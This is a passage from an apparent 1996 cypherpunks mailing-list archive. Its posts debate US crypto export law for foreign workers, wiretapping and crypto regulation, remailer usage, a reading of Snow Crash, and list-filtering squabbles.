which one pays money to the owner whenever you copy it. in the
new system, the article itself has no value-- what you pay is
the system that delivers it to you (all intermediaries, editors,
etc), all the way up to the author.

it will take people awhile to realize, but ratings can actually
be extremely liberating and useful if put into place in a 
robust way. I believe PICS is a very good step in the right
directions. what today is limited to credit ratings etc. will
expand into a system of rating everything, I suspect, and 
it will be done in such a way that everyone agrees it is
a Good Thing and they couldn't imagine getting along without
it.

in the old system, censorship was accomplished by the government
putting chains on, or burning, "atoms". in the future, people will just
select whatever information they are interested in. censorship
of bits is not only inappropriate, it is impossible. censorship
can only work when you have atoms. those who are applying old
"atom" ideas to "bits" will continue for some time to have sway
with the public, until the general population realizes their
arguments are completely specious.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 14 Apr 1996 11:11:13 +0800
To: Jean.Chouanard@grenoble.rxrc.xerox.com (Jean Chouanard)
Subject: Re: US crypto laws? Need help!
In-Reply-To: <v02140b18ad91143a0d5e@[13.202.222.150]>
Message-ID: <v0300630aad95dd01cd43@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:

>I was wondering if a foreigner like, with a valid work visa but not a
>permanet green card, is allowed to use crypto in the state.
>
>If yes, is there any restriction? Depending on crypto methods?

Don't take this as legal advice, since I'm neither a lawyer nor French, but
if you're a French citizen, there may be more restrictions concerning
"utilisation du systemes cryptographique" placed on you by your _own_
government - no matter what your location is worldwide - than the US' ITAR
regs (governing "export" of crypto restrictions will place on you when
working here in the US).

Especially if you're _working_ in the US, (depending on the exact length
and specifications listed on your work permit itself - see the nearest
embassy*) I believe you're allowed to _use_ crypto systems _here_ (it might
even help if it was part of your work), as long as you are supervised in
some way and do not take them away with you (clearly a serious violation
under ITAR). Someone please correct me if I err here.

You - or better yet, your company's legal representative - should contact
the U.S. Department of State, Office of Defense Trade Controls (ODTC) at
<URL:pgpfone:/+1.703.875.6644>**. At the _very_ least, you enjoy an
slightly overlong yet entertaining bureaucratic journey.

Bon Voyage! ;)

   dave


*
The Embassy of France (in the US):
4101 Reservoir Road, NW, Washington D.C. 20007;
telephone (202) 944-6000; fax (202) 944-6072.

US Embassies in France:
The U.S. Embassy in Paris is located at 2 Avenue Gabriel, telephone (33)
1-43-12-22-22, fax (33) 1-42-66-97-83. The Consular Section is located one
block away, across the Place de la Concorde, at 2 Rue St. Florentin, fax
(33) 1-42-61-61-40.
The U.S. Consulate in Marseille is located at 12 Boulevard Paul Peytral,
telephone (33) 91-54-92-00, fax (33) 91-55-09-47.
The U.S. Consulate in Strasbourg is located at 15 Avenue d'Alsace,
telephone (33) 88-35-31-04, fax (33) 88-24-06-95.
There is a Consular Agent in Nice, at 31 Rue du Marechal Joffre, telephone
(33) 93-88-89-55, fax (33) 93-87-07-38.

**relax, you don't have to visit netscape.com for the new html spec, it's
just a joke. Well, for now, anyway... ;)


_________________________________
"A furore Normannorum libera nos"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 14 Apr 1996 09:10:40 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <199604101300.JAA04920@jekyll.piermont.com>
Message-ID: <PkecmD54w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Just a small meta-request. I already filter everything Jim writes --
> its all junk -- but when people reply to a message of his and send the
> mail only to Cypherpunks, it is hard for me to filter the reply.

It's a pity most mailers don't preserve 'References:'.
Can you filter out everything that says 'in-reply-to .* pacifier.com>'?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 09:22:56 +0800
To: Jean.Chouanard@grenoble.rxrc.xerox.com (Jean Chouanard)
Subject: Re: US crypto laws? Need help!
In-Reply-To: <v02140b18ad91143a0d5e@[13.202.222.150]>
Message-ID: <199604132142.RAA11775@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jean Chouanard writes:
> I was wondering if a foreigner like, with a valid work visa but not a
> permanet green card, is allowed to use crypto in the state.

There are no restrictions on the use of cryptography inside the
U.S. of any kind. There are restrictions on exporting cryptography,
and in some instances that can, technically, be giving a foreign
person information on cryptography. However, you are allowed to use
any crypto system your heart desires -- no regulations on it at all.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sun, 14 Apr 1996 10:04:48 +0800
To: cypherpunks@toad.com
Subject: JBell filter (was Re: So, what crypto legislation (if any) is necessary?)
Message-ID: <2.2.32.19960413105947.006aaebc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:22 PM 04/13/96 EDT, dlv@bwalk.dm.com (Dr. Dimitri Vulis) wrote:
>"Perry E. Metzger" <perry@piermont.com> writes:
>> Just a small meta-request. I already filter everything Jim writes --
>> its all junk -- but when people reply to a message of his and send the
>> mail only to Cypherpunks, it is hard for me to filter the reply.
>
>It's a pity most mailers don't preserve 'References:'.
>Can you filter out everything that says 'in-reply-to .* pacifier.com>'?
>

I initially tried filtering out anything _from_ JB; still got overloaded by
people trying to talk some sense into him (at the time, it was Black Unicorn
arguing law with him). Finally had to simply tell Eudora that anything from
him, or including his name (contains:) goes straight to the trash. That
finally did the trick. Interestingly, he's the only one I trash, sight
unseen.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMW96ocVrTvyYOzAZAQH+JgP9G9pAJEFsI0xV263ftQFVdZO1yKM50aKG
5CAqtyWp8fZPtocofo3kC2Z6qdGEbEd2hTM10uxdKh0tggRlWg61Ie44OVjgYfie
5ysPooKQdilinUh2m34lmYpuvMuc4RO+FKn3Y/yrJeUXpvvQX6C8OiWrAVlEAC+c
DaTpcPYVkOc=
=De5u
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 14 Apr 1996 09:40:26 +0800
To: cypherpunks@toad.com
Subject: Crypto, Right to privacy, International standards
Message-ID: <199604132314.SAA17028@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: pgut001@cs.auckland.ac.nz
> Date: Wed, 10 Apr 1996 18:57:07 +1200 (NZST)
> Subject: New paper on crypto regulation and the right to privacy available
> 
>   The notion of a right to privacy of citizens in their communications is
>   discussed in the context of an international movement by governments towards
>   regulation of cryptography, and consideration of key forfeiture systems in
>   national cryptography use.  The authors argue that the right to privacy in
>   communications networks is an issue of major importance, assuring freedom of
>   the individual in national and global communications.  Regulation and control
>   of cryptography use on the Internet by national governments may lead to an
>   imbalance in the citizen/government power relationship, with sequelae
>   including unprecedented surveillance of citizens, disruption of international
>   commerce due to lack of powerful cryptography (and lack of standardisation),
>   human rights abuses by less democratic or non-democratic governments, and
>   limiting of the political potential of an Internet global political system.
>  

Doesn't the United Nations (UN) have some sort of statement about this? I
have a vague recollection that it says something about individuals having
a right to communicate with others including those outside their own
countries.

                                                       Jim Choate
                                                       ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 14 Apr 1996 09:50:50 +0800
To: perry@piermont.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604131757.NAA28090@jekyll.piermont.com>
Message-ID: <199604140011.TAA13006@homeport.org>
MIME-Version: 1.0
Content-Type: text


Perry E. Metzger wrote:

| Adam Shostack writes:
| > 	Snow Crash is a book about a future in which governments are
| > ineffective.  Companies run things, and have complete local control.
| > The world has gone to hell, and as a result, life is nasty, poor,
| > brutish and short.  Many people do not look forward to this world.
| 
| Snow Crash is hardly scary. You have characterized it as a
| story where life is nasty brutish and short but that isn't the same
| book that I read. at all.

	The CIA privatized & selling data to all comers?  An
unstoppable wave of illegal immigration coming to California?  Sounds
pretty scary to many people.  There are other readings, but that one
is there.

| In any case, however, the future is pretty much not stoppable. There
| was a time where the nobility tried to stop the crossbow, and then
| firearms; there have been those who tried to stop the translation of
| the bible, and to stop factories, and to stop genetic
| engineering. Ideas aren't amenable to restraint. Nothing is as
| inevitable as an idea who's time has come. The key to a liveable
| future is learning how to adapt to the changes, not how to try to
| prevent them.

	I said as much.  I'm not purporting this as my opinions, just
my understanding of Dr. Denning.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 14 Apr 1996 10:36:42 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604121744.MAA08365@proust.suba.com>
Message-ID: <199604140025.TAA13102@homeport.org>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim wrote:

| > 	Snow Crash is a book about a future in which governments are
| > ineffective.  Companies run things, and have complete local control.
| > The world has gone to hell, and as a result, life is nasty, poor,
| > brutish and short.  Many people do not look forward to this world.
| > Thats an understandable reaction; when I first heard about anonymous
| > assasination markets, I thought it was pretty bizzare as a world to
| > look forward to.
| 
| I agree with you that it's a pretty bizzare world to look forward to, but 
| how likely is it?  It's always seemed to me that both sides of the crypto 
| debate have been overselling the changes crypto is going to bring.  
| Crypto won't make surveillance impossible, it will make it expensive.  
| That's a big difference.

	I no longer feel its a bizzare world, but rather a fascinating
one.  If you're not working for the government.

| My computer is loaded up with crypto.  I use pgp, ssh, sfs, cfs, etc., 
| every day.  I've picked strong passphrases, and I edit sensitive files on 
| a ram disk.  But getting my data would be child's play for the nsa if 
| they were interested enough in me to come into my apartment and make an 
| active attack.

	But you're one person.  The cost of a wiretap is ~ $150,000
per person.  If there are a few hundred cpunks using the remailers, we
lose.  When there are thousands of people using penet, we win.  The
work that needs to be done is good remailer interfaces.  I'm playing
with Premail right now.  PEP is available for the Mac, and I've heard
good things about both Pegasus & Private Idaho on Wintel.

| Military security depends as much upon military discipline and procedure
| as it does on strong crypto tools.  When crypted email becomes the norm,
| remember that 95% of the keys in the world will be sitting on hard drives
| in the clear or protected by passphrases like "bob1".  Software that
| forces people to pick strong passphrases won't be popular in the
| marketplace.  I know:  I run an ISP, and everytime I tell someone how to
| pick a password, they always come back with "bob1".

	But thats ok.  All of this is about economics.  If its as
cheap for me to have a bank account in the Seychelles as it is to have
one in Boston, why have one in Boston?  And if my account isn't in
Boston, the cost of finding out about my finances goes from a few
hundred dollars to a few tens of thousands.

| The truth is the police do surveillence easily and cheaply now, and it's
| not working.  Things are getting worse in many places, not better.  Beat
| cops who talk to people and who know the neighborhood are more effective
| than spooks in vans or centralized monitoring facilities with
| sophisticated electronics.  If we don't want crime, we're going to have 
| to make sure people have enough skills to develop other economic 
| opportunities.  The answer is jobs, not a telescreen in every home.

	The answer is to decriminalize things like drugs and
prositution.  The drop in taxes would create a jobs boom. :)

| I reject the opposition's premise:  surveillance is not necessary to keep
| the four horsemen at bay.  How can they have the chutzpah to demand that I
| sacrifice my civil liberties in the name of the drug war, when everyone in
| Chicago knows that dealers are allowed to sell without harassment on
| literally thousands of street corners in this city?  They don't need
| clipper to stop the crack trade, they need to send cops out to arrest the
| people who are standing out in broad daylight selling and buying.
| 
| It doesn't take a gps system to track them down.

	I agree, but why arrest them?  Why not tax them a little?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 14 Apr 1996 10:19:12 +0800
To: die@die.com
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604120417.AA22212@pig.die.com>
Message-ID: <199604140029.TAA13117@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dave Emery wrote:

| 	My only disparaging comment (at least as intended by me) was that
| the task was probably beyond some of the alt.2600 type crackers who
| primarily use canned programs and scripts to perpetrate their attacks. 
| That comment was actually intended as a left handed warning about the
| advisablity of releasing a readily reproduced hardware key cracker
| design to the world at large.  This seems especially true if entire FPGA
| array PC plugin boards are becoming a commodity item and readily
| available and the cracker recipe is buy one of those and install this canned
| software on it.

	I disagree strongly about the advisability of this.  If we
demonstrate the utter weakness of 40 bit keys, the US business
community will scream for a better solution.  With a little correct
publicity, like that provided by the BSA, and backed by most companies
security folks who understand the ludicrousness of the law, the NSA
comes up looking like jackasses.

	Anyway, I've found your comments to be very interesting &
informative, and this was a small nit.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 10:23:40 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604140011.TAA13006@homeport.org>
Message-ID: <199604132331.TAA01039@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> Perry E. Metzger wrote:
> 
> | Adam Shostack writes:
> | > 	Snow Crash is a book about a future in which governments are
> | > ineffective.  Companies run things, and have complete local control.
> | > The world has gone to hell, and as a result, life is nasty, poor,
> | > brutish and short.  Many people do not look forward to this world.
> | 
> | Snow Crash is hardly scary. You have characterized it as a
> | story where life is nasty brutish and short but that isn't the same
> | book that I read. at all.
> 
> 	The CIA privatized & selling data to all comers?  An
> unstoppable wave of illegal immigration coming to California?  Sounds
> pretty scary to many people.  There are other readings, but that one
> is there.

Lets be concrete. You say that life in the book is nasty, brutish and
short. The book does not depict people's lives as being short, and it
especially does not appear that most people living in that world have
lives that end in violence. Furthermore, it doesn't depict their lives
as nasty -- it seems like America only more so, with ever escalating
guarantees that your pizza will be delivered on time and fairly normal
lives being lead.

As for illegal immigration, I saw no depiction of it in the book, and
so far as I can tell the legal structure depicted in the book has no
such concept as "illegal immigration".

I can't see that you read the same book.

As the cypherpunks significance of this is rapidly vanishing, I'd
suggest that this be taken to private mail.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 14 Apr 1996 10:37:16 +0800
To: cypherpunks@toad.com
Subject: PRE_dat
Message-ID: <199604132335.TAA27077@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-13-96. Ted's Publisher:

   "Internet Surprise." An editorial on Internet telephony.

   "Reconnaissance of Bosnia Goes On-Line. CIA Displays
   Computer System Using Images From Drone Vehicles."

      The system draws on material from drone vehicles known
      as Predators and provides computerized video, data and
      audio transmissions, using commercial technologies.
      Separate channels carry information at different levels
      of security for NATO members, peacekeepers, Russians and
      US troops.


   PRE_dat






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 13:45:06 +0800
To: unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u8Hnr-0008xYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 PM 4/9/96 -0700, Bill Frantz wrote:
>At  6:27 PM 4/9/96 -0800, jim bell wrote:
>>At 07:08 PM 4/9/96 -0700, Bill Frantz wrote:
>>>At  3:21 PM 4/9/96 -0800, jim bell wrote:
>>>>And the rest of us are tired of seeing those non-responses!
>>>
>>>I wish to state that Jim Bell does not speak for me.
>>
>>Tell me, what is the most exciting, interesting, and imaginative usage of 
>>"Yadda Yadda Yadda" that _you_ remember, Bill?
>
>This will be my last post on this subject.  Since Jim Bell ALWAYS has to
>have the last word on any given subject, he will continue to try to read
>something into my statement that is not there.  I can not get much clearer
>than:
>
>I have not authorized Jim Bell to speak for me.
>

I seem to recall seeing this message about 4 days ago, when it was 
originally posted.  Somehow it is not me who seems to need to "have the last 
word."  Apparently, not only do you need to have the last word, you need to 
have it TWICE.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 13:59:50 +0800
To: Moltar Ramone <cypherpunks@toad.com>
Subject: Re: Contempt charges
Message-ID: <m0u8Hnt-0008xbC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 4/10/96 -0400, Moltar Ramone wrote:

>>No doubt, a judge might whimsically keep Bob in jail for a while, trying 
>>to assure that he has revealed all of the pass phrases, but the judge 
>>can never be certain, even when Bob has disclosed everything.  This 
>>situation creates doubt that Bob is in contempt, even when he is, and 
>>makes a prison term relatively pointless, unless for revenge.


Despite your silly inferences below, I did not write this note that you are 
responding to.  However, I'd be happy to enter into a $1000 wager with you 
on this.  I'll give permission to any anonymous remailer through which this 
message might have passed (assuming it keeps reverse addresses, many do not) 
to release the original message IF I sent it.  If I did not, you pay me 
$1000.  If I did, I pay you $1000.

Deal?  Somehow I don't think you'll take me up on it.


>But that's what a contempt charge is _for_: "You're not treating me with 
>respect, so I'm going to punish you." It might be described as being for 
>a particular reason (ie supressing evidence), but each of those reasons 
>ultimately boils down to lack of respect.

Question:  How can a judge tell he's being treated with "respect" under the 
conditions described?   Simple answer:  He can't.  What, exactly, would the 
difference between "respect" and "no respect" be?


>In addition, were I handing down (or prosecuting) the contempt charges, I'd 
>claim that the statement (even if it was made in public) that the individual 
>didn't know all the keys in the first place was a lie, and that, by repeating 
>the lie, they were purjuring themself.

Proof would be a bit difficult under the circumstances.  However, I am sure 
that you consider minor issues such as proof to be of no consequence.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 10:36:05 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Web of Trust Keyring
Message-ID: <Pine.SUN.3.91.960413194542.9295C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a pointer to the Web of Trust Keyring?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 14 Apr 1996 11:16:39 +0800
To: cypherpunks@toad.com
Subject: Mixmaster through conventional anonymous remailer
Message-ID: <Pine.LNX.3.91.960413195348.29649A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


Is there a way to send an anonymous E-Mail message to anon.penet.fi and
then have it pass through mixmaster from there, instead of invoking the
mixmaster command locally?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 14 Apr 1996 11:02:02 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Watch your language, Shabbir.
In-Reply-To: <m0u6qZK-0008y1C@pacifier.com>
Message-ID: <Pine.3.89.9604131930.D22882-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 9 Apr 1996, jim bell wrote:

> Look, very carefully, at the last paragraph quoted above.  Mr. Safdar says, 
> "No reasonable person is objecting to the FBI's right to conduct a wiretap."

That's right. Because no reasonable person thinks they can convince Congress
or the Supremes otherwise. It isn't impossible, but energies are best spent 
elsewhere, like getting the Burns bill passed. 

Now none of us think wiretaps are a right and I presume Shabbir isn't 
much of a fan either or he wouldn't take the trouble of supporting 
something that makes wiretapping pointless (crypto). But we and he are 
not Washington and there lies all the difference.

Do remember, Jim, that just 'cause most of this list is libertarian 
doesn't mean that the rest of the world is. I'm thankful that they can 
occasionally agree with us horsepeople, despite the hysteria. Be polite.


Flames > /dev/null




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 14 Apr 1996 13:36:01 +0800
To: Laszlo Vecsey <cypherpunks@toad.com
Subject: Re: Mixmaster through conventional anonymous remailer
Message-ID: <ad961c07030210042ad5@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


Since Mixmaster requires a special message format, you must have the
client. You can send a completed mixmaster message throught other kinds of
remailers before sending it to the first Mixmaster in the chain (although
there is not much point).

        -Lance

At 4:59 PM 4/13/96, Laszlo Vecsey wrote:
>Is there a way to send an anonymous E-Mail message to anon.penet.fi and
>then have it pass through mixmaster from there, instead of invoking the
>mixmaster command locally?

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 14:31:49 +0800
To: <s1113645@tesla.cc.uottawa.ca>
Subject: Re: Watch your language, Shabbir.
Message-ID: <m0u8Id7-0008ylC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:07 PM 4/13/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
>
>On Tue, 9 Apr 1996, jim bell wrote:
>
>> Look, very carefully, at the last paragraph quoted above.  Mr. Safdar says, 
>> "No reasonable person is objecting to the FBI's right to conduct a wiretap."
>
>That's right. Because no reasonable person thinks they can convince Congress
>or the Supremes otherwise. It isn't impossible, but energies are best spent 
>elsewhere, like getting the Burns bill passed. 

But that's not entirely the issue.   Mr. Safdar's wording is critical, 
because it concedes FAR too much about what the government is assumedly 
entitled to do. Below, you've admitted that everybody here believes in what 
Mr. Safdar claims "no reasonable person" believes.  Is Mr. Safdar saying 
we're ALL not reasonable?!?  Are you?

Further, I've read of multiple polls (Unfortunately, I can't quote a 
specific one) that show that a substantial _majority_ of the population 
objects to wiretaps under most any circumstance. (The figure I seem to recall was 
somewhere between 60% and 70%)  If this recollection is true, and if the 
poll was accurate, there is no reason to believe that even your adjustments 
to Mr. Safdar's position is a accurate limit on reasonableness.  

I claim:

1.  The vast majority of the population does not believe that the ability to 
wiretap is a government "right."

2.  A majority of the population does not believe that the government should 
wiretap, even if it is assumed to have this authority.

>Now none of us think wiretaps are a right and I presume Shabbir isn't 
>much of a fan either or he wouldn't take the trouble of supporting 
>something that makes wiretapping pointless (crypto).

However, why did he make the claim the way he did?  Is it just sloppy 
spokesmanship?  Worse, why did no one else catch this gaffe?  Is everybody 
else asleep? I saw no other commentary indicating that anybody noticed  his 
statements.   Are they ignoring Mr. Safdar's postings?  Are they not reading 
them at all?  Do these people not recognize that his comments practically 
grant the entire enchilada to the government?  Why did he do this?  And why 
hasn't he corrected what is apparently a huge mistake?


> But we and he are 
>not Washington and there lies all the difference.

Let's assume that my recollection is correct and most people don't want 
wiretapping at all.  Why, exactly, should you believe that we're fated to 
get it anyway? (If you recall, I quoted part of a Brittanica article which 
said that from 1934 to 1968, a number of attempts to write wiretapping into 
law FAILED.  Clearly, wiretapping wasn't inevitable then, and it doesn't 
have to be inevitable now.)

 Consider a hypthetical discussion with some Senator or 
Representative, where we point out that the public, as a whole, does not 
want wiretaps at all.  "Why," we should ask, "should wiretaps occur when the 
public doesn't want them?  Doesn't the majority get its way, at least in 
situations such as this?  (It violates nobody's rights to NOT have wiretaps.)"

The bigshot could come back and say, "But law-enforcement WANTS wiretaps!"  
Our next question should be, "Okay, but why does a tiny fraction of the 
population get more say in what happens than 70% of the public?  Even if, 
arguably, wiretaps are beneficial, if the majority says they want to forgo 
this benefit, why don't they have this privilege?" 

At this point, the government sleazeball  might not admit to the problem, 
but I doubt he'd have much of a response.


>Do remember, Jim, that just 'cause most of this list is libertarian 
>doesn't mean that the rest of the world is.

If, say, 70% or even 60% or 50% of the public doesn't want wiretaps at all,  
calling oneself libertarian is not required to share the opinion that 
government doesn't have the "right" to do them.  Thus, I didn't couch my 
argument in terms that would require a libertarian to agree with them.  This 
was intentional:  I wasn't attempting to claim that the politicians 
are somehow obligated to follow libertarian opinions, but they damn well 
listen to MAJORITY opinions, at least when they limit what government should do!

> I'm thankful that they can 
>occasionally agree with us horsepeople, despite the hysteria. Be polite.

Hey, I _was_ adequately polite.  However, unlike many of the people who are 
asleep at the switch around here, I am observant and I don't accept bullshit 
just because it is couched in terms that sound friendly.  This incident, and 
particularly the failure of nearly all of the regular posters to see the 
problem with Shabbir's comments,  has convinced me that a substantial 
fraction of the people who regularly post on CP aren't carefully considering 
issues such as rights of the population when they read this kind of 
material.  You, at least, acknowledged that wiretapping isn't a "right."  
Where is everyone else's objection to Shabbir's statement?

BTW, I'm not suggesting that I think that the majority of the population 
must necessarily have the "right" to do wiretaps if they want them:  I'm 
saying that they have a right to NOT do wiretaps.  There is a distinct 
difference between these two positions.  The constitution may prohibit 
wiretaps even if the majority wants them; logic and history shows that the 
constitution does not MANDATE wiretaps even if the majority doesn't want them.


Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 14 Apr 1996 14:20:27 +0800
To: Jean Chouanard <Jean.Chouanard@grenoble.rxrc.xerox.com>
Subject: Re: US crypto laws? Need help!
In-Reply-To: <v02140b18ad91143a0d5e@[13.202.222.150]>
Message-ID: <Pine.SOL.3.91.960413203112.28313A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 10 Apr 1996, Jean Chouanard wrote:

> I was wondering if a foreigner like, with a valid work visa but not a
> permanet green card, is allowed to use crypto in the state.
> 
> If yes, is there any restriction? Depending on crypto methods?

You need to get an export licence if you want to be legal; however, this 
sort of licence is more or less automatic, and should only take a few 
weeks to process.

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 14 Apr 1996 12:30:14 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Web of Trust Keyring
In-Reply-To: <Pine.SUN.3.91.960413194542.9295C-100000@polaris.mindport.net>
Message-ID: <Pine.LNX.3.92.960413203618.2697A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 13 Apr 1996, Black Unicorn wrote:

> Does anyone have a pointer to the Web of Trust Keyring?

ftp://utopia.hacktic.nl/pub/replay/pub/pgp/pgp-key-ring/weboftrust.*

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMXBJC7Zc+sv5siulAQFHIQP+JF0DAUha7I99MMIE7S/nFvJtRXttZYhp
IkjCNryZwSckKYimCJP561sx7MK8khDo7cx98i4udB5ZnkJIlfpxWNIM/YMpsVy/
k9vIwc0VQW1gX4rHVpJAa+UUjG7US5OllfSvgTMV2SICvvBNoUyUogOQUsnbN3Uy
Qd+stiHkFV8=
=pIEC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Sun, 14 Apr 1996 14:32:39 +0800
To: cypherpunks@toad.com
Subject: Lucifer & DES
Message-ID: <199604140347.UAA22331@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry

My apologies for any misunderstanding in my original post.  I was merely 
trying to point out IBM's historical compliance with govt suggestions for 
the design of the S-boxes.  Please excuse me if my facts are adrift.

My point was that this may shed light on IBM/Lotus' acceptance of the 
40+24 work force reduction scheme.  IBM may be receptive to working with 
the government yet again.


Jerry Whiting
jwhiting@azalea.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 14:52:00 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena
Message-ID: <m0u8Iup-0008y0C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:30 PM 4/13/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
>
>
>On Wed, 10 Apr 1996, sameer wrote:
>
>> 
>> 	Frankly, I'm getting antsy. Is C2 going to get subpoena'd or
>> not? I would be very disappointed if we don't.
>> 	(Subpeonas envy!)
>
>All you have to do is call up CoS's lawyers. Let your fingers do the 
>walking...
>
>Seriously though, might it not be nicer (easier?) to establish some court
>precedents on remailers vs. CoS rather than the government? Think of it as
>a preemptive strike.

Sounds like forum shopping/defendant shopping/plaintiff shopping.  An 
